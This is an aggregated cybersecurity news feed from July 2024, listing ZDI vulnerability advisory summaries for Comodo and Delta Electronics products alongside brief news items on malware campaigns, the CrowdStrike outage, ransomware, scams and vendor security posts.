This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Internet Security Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

2024-07-23 00:00:00

ZDI-24-956: (0Day) Comodo Internet Security Pro cmdagent Link Following Local Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Internet Security Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

2024-07-23 00:00:00

ZDI-24-955: (0Day) Comodo Internet Security Pro cmdagent Link Following Local Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Internet Security Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

2024-07-23 00:00:00

ZDI-24-954: (0Day) Comodo Firewall Link Following Local Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Firewall. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

2024-07-23 00:00:00

ZDI-24-953: (0Day) Comodo Internet Security Pro Directory Traversal Local Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of Comodo Internet Security Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

2024-07-22 21:53:20

EvilVideo, a Telegram Android zero-day allowed sending malicious APKs disguised as videos

EvilVideo is a zero-day in the Telegram App for Android that allowed attackers to send malicious APK payloads disguised as videos. ESET researchers discovered a zero-day exploit named EvilVideo that targets the Telegram app for Android. The exploit was for sale on an underground forum from June 6, 2024, it allows attackers to share malicious […]

by Security Affairs

2024-07-22 21:34:02

Linx Security Launches With Identity Management Platform

The Israeli security startup''s technology helps organizations map existing accounts and credentials to existing employees to identify those that should be removed.

by Dark Reading

2024-07-22 21:21:43

Microsoft Releases Tool to Fix CrowdStrike-Caused Windows Chaos

Microsoft releases a recovery tool to fix CrowdStrike outages that crippled IT systems worldwide. The tool offers two…

by Hackread

2024-07-22 20:16:27

When Scammers Call Grandma

So-called ""grandparent scams"" or ""family emergency scams"" target older adults and usually occur over the phone, although other means of communication can be used. The scammers impersonate law enforcement, attorneys, or the relatives themselves. The criminals work to convince the victim that a family member is in deep trouble, a lot of money is required, and the victim has to keep it all a secret. With the rise of audio and video-generative AI, these scams are harder to detect. Still, there are red flags to look for. You should also talk to your family about these incidents and how you can all work together to stay safe. The post When Scammers Call Grandma appeared first on National Cybersecurity Alliance.

by National Cybersecurity Alliance

2024-07-22 18:55:27

Teenage Scattered Spider Suspect Arrested in Global Cybercrime Sting

The authorities intend to send a message to these cybercrime groups that their criminal offenses and ransomware attacks are not worth the fallout.

by Dark Reading

2024-07-22 18:36:16

Phishing Attacks Will Likely Follow Last Week’s Global IT Outage

Organizations should expect to see phishing attacks exploiting the global IT outage that occurred last Friday, the Business Post reports.

by KnowBe4

2024-07-22 18:36:12

[Security Masterminds Podcast] Securing Software Over 50 Years: Reflections from an Industry Veteran

Does the challenge of keeping up with cybersecurity trends sound familiar? You may have been told to update your antivirus software and hope for the best, only to find that your digital assets are still at risk.

by KnowBe4

2024-07-22 18:35:00

Experts Uncover Chinese Cybercrime Network Behind Gambling and Human Trafficking

The relationship between various TDSs and DNS associated with Vigorish Viper and the final landing experience for the user A Chinese organized crime syndicate with links to money laundering and human trafficking across Southeast Asia has been using an advanced ""technology suite"" that runs the whole cybercrime supply chain spectrum to spearhead its operations. Infoblox is tracking the proprietor

by The Hacker News

2024-07-22 18:23:04

How Behavioral Detections Aid Healthcare Security

Healthcare organizations face unique cybersecurity challenges due to their hybrid IT (information technology) environments, sensitive data, and resource constraints.

by Mitiga

2024-07-22 18:18:55

Swipe Right for Data Leaks: Dating Apps Expose Location, More

Apps like Tinder, Bumble, Grindr, Badoo, OKCupid, MeetMe, and Hinge all have API vulnerabilities that expose sensitive user data, and six allow a threat actor to pinpoint exactly where someone is.

by Dark Reading

2024-07-22 18:02:33

Threat Hunting Market Worth $6.9B by 2029

by Dark Reading

2024-07-22 17:57:53

Telegram Android Vulnerability “EvilVideo” Sends Malware as Videos

EvilVideo exploit in Telegram for Android lets attackers send malware disguised as videos. ESET discovered this zero-day vulnerability,…

by Hackread

2024-07-22 17:56:00

PINEAPPLE and FLUXROOT Hacker Groups Abuse Google Cloud for Credential Phishing

A Latin America (LATAM)-based financially motivated actor codenamed FLUXROOT has been observed leveraging Google Cloud serverless projects to orchestrate credential phishing activity, highlighting the abuse of the cloud computing model for malicious purposes. ""Serverless architectures are attractive to developers and enterprises for their flexibility, cost effectiveness, and ease of use,"" Google

by The Hacker News

2024-07-22 17:06:02

Russian Hacktivists Sanctioned for US Critical Infrastructure Attacks

"CARR" hackers have managed to gain control over ICS and SCADA systems in the US and Europe.

by Dark Reading

2024-07-22 16:59:04

Chinese Vigorish Viper Exploits DNS and Football Sponsorships for Illegal Gambling

Unmasking Vigorish Viper: The Elusive Cybercrime Network Behind Illegal Gambling. Learn how this sophisticated group uses clever DNS…

by Hackread

2024-07-22 16:55:00

How to Set up an Automated SMS Analysis Service with AI in Tines

The opportunities to use AI in workflow automation are many and varied, but one of the simplest ways to use AI to save time and enhance your organization’s security posture is by building an automated SMS analysis service. Workflow automation platform Tines provides a good example of how to do it. The vendor recently released their first native AI features, and security teams have already

by The Hacker News

2024-07-22 16:45:50

Quantum Leap: Advanced Computing Is a Vulnerable Cyber Target

At Black Hat USA, researchers from Bitdefender and Transilvania Quantum will showcase how attackers can target quantum-based infrastructure.

by Dark Reading

2024-07-22 16:37:09

CrowdStrike’s fallout, Harris’s stance on tech and Yandex’s rise from the ashes

On today’s episode of Equity, Rebecca Bellan did a deep dive into the CrowdStrike outage that affected around 8.5 million Windows devices around the world, causing disruptions in air travel, banking, hospitals, media outlets, federal agencies and businesses of all kinds. The outage began when CrowdStrike, a cloud security giant, sent out a defective software […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-22 16:23:32

🐝 Hive Five 181 - What the Dying Teach the Living

Innovative Recon Tool: Lemma, AI Tooling for Software Engineers in 2024, Embrace Action Over Perfection, 12-Minute Foundation Training, and more...

by Hive Five

2024-07-22 16:11:00

MSPs & MSSPs: How to Increase Engagement with Your Cybersecurity Clients Through vCISO Reporting

As a vCISO, you are responsible for your client''s cybersecurity strategy and risk governance. This incorporates multiple disciplines, from research to execution to reporting. Recently, we published a comprehensive playbook for vCISOs, “Your First 100 Days as a vCISO – 5 Steps to Success”, which covers all the phases entailed in launching a successful vCISO engagement, along with recommended

by The Hacker News

2024-07-22 16:00:00

TechCrunch Minute: What caused last week’s major tech outage?

Late last week, there was a worldwide tech outage that affected everything from airports to banks to healthcare. Flights were grounded across the United States. So, what actually happened? The source of all those problems seems to be a popular cybersecurity company called CrowdStrike and its flagship software product Falcon Sensor. Apparently a “defect” in […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-22 15:09:38

Pair of court rulings have cybersecurity implications

CISOs and other security professionals should carefully consider the legal ramifications and any personal liability when discussing the state of cybersecurity in their organization.

by Barracuda

2024-07-22 15:02:41

Cloudy with a Chance of Hackers: Protecting Critical Cloud Workloads

If you''ve been following along with David''s posts, you''ll have noticed a structure to the topics: Part I: The Plan, Part II: The Execution and now we move into Part III: Security Operations. Things get a bit more exciting at this point as we discuss topics to detect, delay and mitigate active cyber threats. The planning and delivery of our security solutions are about to pay off!

by SpiderLabs Blog

2024-07-22 14:58:50

Heritage Foundation data breach containing personal data is available online

Data from the Heritage Foundation containing at least half a million passwords and usernames are available online

by Malwarebytes Labs

2024-07-22 14:41:52

Countdown to Paris 2024 Olympics: France leads in web interest

As the Paris 2024 Olympics approach, our analysis reveals France, the host nation, leads in DNS traffic to official Olympic sites, followed by the UK, the US, and Australia

by Cloudflare

2024-07-22 14:23:13

Fallout From Faulty Friday CrowdStrike Update Persists

Historic IT outage expected to spur regulatory scrutiny, soul-searching over "monoculture" of IT infrastructure — and cyberattack threats.

by ITPro Today

2024-07-22 14:00:00

Kaspersky Is an Unacceptable Risk Threatening the Nation's Cyber Defense

As geopolitical tensions rise, foreign software presents a grave supply chain risk and an ideal attack vector for nation-state adversaries.

by Dark Reading

2024-07-22 14:00:00

Sysdig Threat Research Team – Black Hat 2024

The Sysdig Threat Research Team (TRT)  is on a mission to help secure innovation at cloud speeds. A group of... The post Sysdig Threat Research Team – Black Hat 2024 appeared first on Sysdig.

by Sysdig

2024-07-22 13:30:37

Ransomware Attack Shuts Down LA County Courts, Halts Inmate Transfers, Evictions

The Superior Court of Los Angeles County, the United States’ largest trial court, has suffered a crippling ransomware…

by Hackread

2024-07-22 13:02:14

22nd July – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 22nd July, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES American Bassett Furniture Industries has been a victim of a ransomware attack that resulted in the encryption of data files and the shutdown of its manufacturing facilities. The attack has significantly disrupted […] The post 22nd July – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

2024-07-22 13:00:00

Chinese Forced-Labor Ring Sponsors Football Clubs, Hides Behind Stealth Tech

An illegal gambling empire fueled by modern-day slavery is being propped up by high-profile sponsorships — and defended with sophisticated anti-detection software.

by Dark Reading

2024-07-22 13:00:00

Improving Your Cloud Security Using JIT Access for Sensitive SaaS Applications

Using just-in-time controls to secure access to your SaaS applications will reduce your cloud attack surface by avoiding permanent access and enforcing least privilege.By granting permissions on a time-limited, as-needed basis only, just-in-time (JIT) controls are an important security mechanism for protecting access to cloud resources. JIT access is becoming a popular cloud security practice, with enterprises applying it innovatively in real world scenarios.It turns out that another excellent cloud use case for JIT has evolved. For easier security scaling, many organizations are using their identity provider’s groups function (IdP groups) to grant and manage access to software-as-a-service (SaaS) applications, such as those from Salesforce. By applying JIT to IdP groups, organizations can apply the best practice of role-based access management to their SaaS apps and ensure access is granted only as needed. Adopting this new use case is a simple next step for security teams already using JIT for cloud resources.Specifically, by applying JIT to IdP groups you can create an access-request flow in which users request either one-off access or permissions elevation, and requests are evaluated or granted either automatically or by a designated approver. Access is limited to just hours and becomes process-driven, with the granted privileges revoked upon expiration. JIT prevents the risk posed by permanent access to SaaS applications by narrowing the window of opportunity for malicious use of compromised credentials and vulnerabilities.Why is JIT access for SaaS applications important?Social engineering (including phishing), credentials compromise and malicious internal users are common beachheads for penetrating a cloud environment. Once bad actors gain access, excessive permissions such as permanent access - aka standing permissions - open your environment to compromise. Placing time-bound limits on permissions helps prevent exposure to such attack vectors. Using JIT to engineer temporary access for cloud resources and also for sensitive cloud applications not only makes your cloud environment more secure, it also enforces the least privilege practices required by compliance regulations. It’s important to note that the SaaS user is typically a business user. So using JIT to control access to sensitive SaaS applications extends security beyond development and IT users to the organization’s business environment. Security leaders have an organic opportunity to capitalize on existing use of JIT for cloud resources to drive adoption of JIT for SaaS apps – scaling security and improving their enterprise’s cloud security maturity.What to look for in JIT access for SaaS For future proofing your JIT investment, make sure you consider a JIT access capability that supports your current cloud identity provider and others. You’ll want to evaluate JIT tooling that is part of a comprehensive cloud security solution, namely, a cloud native application protection platform (CNAPP) that includes strong capabilities for cloud identity entitlement management (CIEM) and data security posture management (DSPM). CIEM makes it easier to detect where you have the most significant identity risks that warrant mitigating using the JIT approach. DSPM helps you understand which resources are more sensitive than others. Overall, JIT implemented as part of a CNAPP provides insight into multi-cloud risk and context across your infrastructure, workloads, identities and data that is inherently lacking in standalone JIT tooling.Be sure your JIT solution for cloud provides full reporting on access requests and denials, changes in eligibility and user activities during temporary access.How JIT for SaaS applications worksHere’s an example of how Tenable Cloud Security, our CNAPP solution, has implemented JIT for SaaS. The process is straightforward and takes just a few minutes. First, security personnel and/or system/applications administrators, working with the IdP groups function of their organization’s IdP, create an eligibility for the business application for which they want to enable temporary access. Next, any user in the organization seeking access to the business application uses a collaboration tool like Slack or Microsoft Teams, or Tenable’s cloud JIT portal, to submit a temporary access request. Approval is granted automatically or by the designated approvers, as specified within the eligibility. Automatic approvals are according to the permissions defined for the group or groups for which the user is eligible.Step 1. Security teams create eligibilities with time-bound accessIn a few clicks, security personnel or the relevant admin create an eligibility. This involves specifying the group that has permissions to the application, the principals (user or group) that can submit requests, maximum session duration and designated approvers.  Tenable Cloud Security enables security teams, system admins and application admins, using the IdP group function of their identity provider such as Microsoft Entra ID, to define eligibilities to easily manage temporary access requests to SaaS applications.Step 2. Users request temporary access In Slack, Microsoft Teams or the Tenable Cloud Security self-service JIT portal, users specify the desired permissions, access duration and start time, and provide a brief business justification.Tenable Cloud Security enables an organization’s users, via Slack, Microsoft Teams or its self-service JIT portal, to request temporary access – access they don’t yet have at all or elevated access – to the desired application.When temporary access is approved, the user can see, within their IdP, their assigned access to the requested application.Nothing good lasts forever -- and that’s the raison d’etre of JIT. When the session expires, Tenable Cloud Security automatically revokes the user’s permissions. Depending on the case, the user will no longer have access to the application or access will be based on their original permissions. In short, Tenable Cloud Security’s JIT for cloud helps organizations protect both cloud resources and SaaS applications across AWS, Azure, Google Cloud Platform and Oracle – and seamlessly expand their familiar use of JIT to cover SaaS apps, as well. Tenable’s cloud JIT is AWS-validated for IAM Identity Center.To learn more, check out our Tenable JIT for IdP recorded demo below – or request a live demo on Tenable Cloud Security overall or on Tenable CIEM and JIT in particular.Using JIT Access for Sensitive SaaS Applications

by Tenable

2024-07-22 12:59:04

Linx emerges from stealth with $33M to lock down the new security perimeter: Identity

Identity management is one of the most common fulcrums around which security breaches have pivoted in the last several years. One of the main reasons it has become the gift that keeps on giving to malicious hackers is that it’s a nightmare for organizations to track. A security startup founded in Tel Aviv called Linx […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-22 12:43:55

More Enterprises Want Hybrid Cloud, Not Public

A new report from research firm ISG shows U.S. enterprises are choosing hybrid cloud over public due to cost and control. Gen AI plays a role in the trend.

by ITPro Today

2024-07-22 12:15:00

SocGholish Malware Exploits BOINC Project for Covert Cyberattacks

The JavaScript downloader malware known as SocGholish (aka FakeUpdates) is being used to deliver a remote access trojan called AsyncRAT as well as a legitimate open-source project called BOINC. BOINC, short for Berkeley Open Infrastructure Network Computing Client, is an open-source ""volunteer computing"" platform maintained by the University of California with an aim to carry out ""large-scale

by The Hacker News

2024-07-22 12:08:00

India’s Largest Cryptocurrency Exchange WazirX Hacked: $234.9 Million Stolen

India’s largest cryptocurrency exchange WazirX launches bug bounty program “to help recover the stolen funds” as cybercriminals stole…

by Hackread

2024-07-22 12:00:00

Fallout From Faulty Friday CrowdStrike Update Persists

Historic IT outage expected to spur regulatory scrutiny, soul-searching over "monoculture" of IT infrastructure — and cyberattack threats.

by Dark Reading

2024-07-22 11:45:00

NCA cracks digitalstress DDoS-for-hire operation

by ComputerWeekly

2024-07-22 11:20:02

SocGholish malware used to spread AsyncRAT malware

The JavaScript downloader SocGholish (aka FakeUpdates) is being used to deliver the AsyncRAT and the legitimate open-source project BOINC. Huntress researchers observed the JavaScript downloader malware SocGholish (aka FakeUpdates) that is being used to deliver remote access trojan AsyncRAT and the legitimate open-source project BOINC (Berkeley Open Infrastructure Network Computing Client). The BOINC project is […]

by Security Affairs

2024-07-22 10:38:03

Is SWG Dead?

Secure Web Gateways (SWG) are one of the first true internet-based security technologies, and one of the most widely used. They have evolved over the years to counter the ever-escalating threats that lurk on the web, and if anything, are more relevant than ever.

by Forcepoint Blog

2024-07-22 10:30:00

The Pentagon Wants to Spend $141 Billion on a Doomsday Machine

The DOD wants to refurbish ICBM silos that give it the ability to end civilization. But these missiles are useless as weapons, and their other main purpose—attracting an enemy’s nuclear strikes—serves no end.

by WIRED Security News

2024-07-22 10:00:51

From RA Group to RA World: Evolution of a Ransomware Group

Ransomware gang RA World rebranded from RA Group. We discuss their updated tactics from leak site changes to an analysis of their operational tools. The post From RA Group to RA World: Evolution of a Ransomware Group appeared first on Unit 42.

by Palo Alto Networks - Unit42

2024-07-22 09:50:00

NCSC: Beware of criminal CrowdStrike opportunists

by ComputerWeekly

2024-07-22 09:26:00

New Linux Variant of Play Ransomware Targeting VMware ESXi Systems

Cybersecurity researchers have discovered a new Linux variant of a ransomware strain known as Play (aka Balloonfly and PlayCrypt) that''s designed to target VMware ESXi environments. ""This development suggests that the group could be broadening its attacks across the Linux platform, leading to an expanded victim pool and more successful ransom negotiations,"" Trend Micro researchers said in a

by The Hacker News

2024-07-22 09:01:00

CrowdStrike, Microsoft scramble to contain fallout from global IT outage

Cybersecurity and IT experts said users are having major difficulties in recovery efforts, despite workarounds and guidance the vendors released.

by Cybersecurity Dive

2024-07-22 09:00:02

Industry Moves for the week of July 22, 2024 - SecurityWeek

Explore industry moves and significant changes in the industry for the week of July 22, 2024. Stay updated with the latest industry trends and shifts.

by SecurityWeek

2024-07-22 09:00:00

Closing the Gender Pay Gap in IT: A Step Closer to Clinking Champagne Glasses

However, the participation gap between males and females in the IT industry is still significant, according to ITPro Today''s 2024 IT Salary Survey Report.

by ITPro Today

2024-07-22 09:00:00

How To Do a Security Audit of Pimcore Enterprise Platform

Our new research paper gives you a roadmap for using Pimcore''s features while preserving security.Enterprises are using Pimcore, an open-source enterprise PHP solution, to streamline data management and experience management across devices. Our new research paper ""Auditing Pimcore Enterprise Platform"" examines the most common issues with Pimcore and details methods that can be used to find new vulnerabilities in the software.Pimcore integrates various functionalities, including product information management (PIM), master data management (MDM), digital asset management (DAM), customer data platform (CDP), and digital experience management (DXP). Built on the PHP Symfony framework, Pimcore can be deployed on-premises or in the cloud as a platform-as-a-service (PaaS) component.Our research paper provides an overview of the core functionalities and structure of Pimcore, highlighting how its modular design promotes code reusability and maintainability. It also delves into common misconfigurations and vulnerabilities, such as cross-site scripting (XSS) and SQL injections (SQLi), and offers practical recommendations on how to safeguard your Pimcore instance.By reading this research, you will:Understand core functionalities: Gain insights into the architecture of Pimcore and how it leverages the Symfony framework to provide a scalable and flexible solution.Identify common vulnerabilities: Learn about the typical security issues found in Pimcore installations, including misconfigurations that can lead to significant security risks.Learn best practices: Get expert advice on maintaining security, performing regular vulnerability scans, and ensuring your Pimcore stack is always up-to-date.Our paper also discusses the impact of enabling debug mode, the risks associated with exposed administration panels, and the importance of a stringent Content Security Policy (CSP). We provide detailed methodologies for identifying and mitigating the risks and ensuring that your use of Pimcore remains secure.Whether you are a developer, security professional, or IT manager, this paper will equip you with the knowledge to optimize and protect your Pimcore deployments.Download the paper now to understand the full potential of Pimcore while maintaining your security posture.

by Tenable

2024-07-22 08:55:00

CrowdStrike’s unforced error puts its reputation on the line

The widespread release of defective code suggests CrowdStrike didn’t properly test its update before it was released or that process failed to catch the mistake, experts said.

by Cybersecurity Dive

2024-07-22 08:15:03

Scams at the Paris Olympics | Kaspersky official blog

What kind of scams await spectators of the 2024 Summer Olympics in Paris?

by Kaspersky

2024-07-22 07:14:48

A week in security (July 15 – July 21)

A list of topics we covered in the week of July 15 to July 21 of 2024

by Malwarebytes Labs

2024-07-22 07:08:42

UK police arrested a 17-year-old linked to the Scattered Spider gang

Law enforcement arrested a 17-year-old boy from Walsall, U.K., for suspected involvement in the Scattered Spider cybercrime syndicate. Law enforcement in the U.K. arrested a 17-year-old teenager from Walsall who is suspected to be a member of the Scattered Spider cybercrime group (also known as UNC3944, 0ktapus). The arrest is the result of a joint international law enforcement […]

by Security Affairs

2024-07-22 06:59:27

Threat Actors Use Telegram APIs for Harvesting Credentials

Executive Summary In recent weeks, there has been an increase in phishing attacks, conducted through messaging platforms like Telegram. Telegram is a widely used app that allows users to send messages, photos, videos, and

by Forcepoint Blog

2024-07-22 06:00:00

Under-Resourced Maintainers Pose Risk to Africa's Open Source Push

Many nations see open source software as a great equalizer, giving the Global South the tools necessary for sustainable development. But recent supply chain attacks highlight the need for security.

by Dark Reading

2024-07-22 04:00:00

CIA AI director Lakshmi Raman claims the agency is taking a ‘thoughtful approach’ to AI

As a part of TechCrunch’s ongoing Women in AI series, which seeks to give AI-focused women academics and others their well-deserved — and overdue — time in the spotlight, TechCrunch interviewed Lakshmi Raman, the director of AI at the CIA. We talked about her path to director as well as the CIA’s use of AI, and the […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-22 00:00:00

ZDI-24-952: Delta Electronics CNCSoft-G2 DPAX File Parsing Memory Corruption Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-951: Delta Electronics CNCSoft-G2 DPAX File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39883.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-950: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-949: Delta Electronics CNCSoft-G2 DPAX File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39883.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-948: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39882.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-947: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-946: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-945: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-944: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-943: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-942: Delta Electronics CNCSoft-G2 DPAX File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39882.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-941: Delta Electronics CNCSoft-G2 DPAX File Parsing Memory Corruption Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39881.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-940: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-939: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-938: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-937: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-936: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-935: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-934: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-933: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-932: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-39880.

by Zero Day Initiative Advisories

2024-07-22 00:00:00

ZDI-24-931: Delta Electronics CNCSoft-G2 DPAX File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability

